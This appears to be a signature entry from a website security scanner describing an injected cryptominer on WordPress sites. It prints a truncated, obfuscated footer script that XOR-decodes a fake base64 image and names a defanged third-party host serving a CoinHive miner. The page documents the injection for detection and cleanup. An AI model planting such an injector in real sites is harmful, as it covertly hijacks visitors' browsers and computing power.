SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.cryptominer.1


Website contains a script that among other things injects a CoinHive JavaScript miner into browsers of the site visitors.

The script is typically injected into the footer section of web pages. It hids from search enigne bots and changes frequently. The main decoded part looks like a fake base64-encoded image

<scr​ipt type="text/javascript"<
var aa9​5f71="data:​image/jpg;base64​,d8e4bc​b1aef8abaca1b4bde5faa8b7abb1acb1b7b6e2f8b9baabb7b4adac...skipped...aee6d2==";
for (var i=​24; i<aa95f71.length-​2; i+=2) 
document .​write(String​.fromCharCode(​parseInt(aa95f71[​i]+""+aa95f71[i+1]​,16)​^parseInt(aa95f71[​22]+""+aa95f71[​23],​16)));</script<

This script loads a CoinHive miner from a hacked third-party site hxxp://oneyoungcome[.]com/jqueryui.js.
The script may also redirect certain visitors to ad sites or inject other malicious scripts.

Affecting: WordPress sites.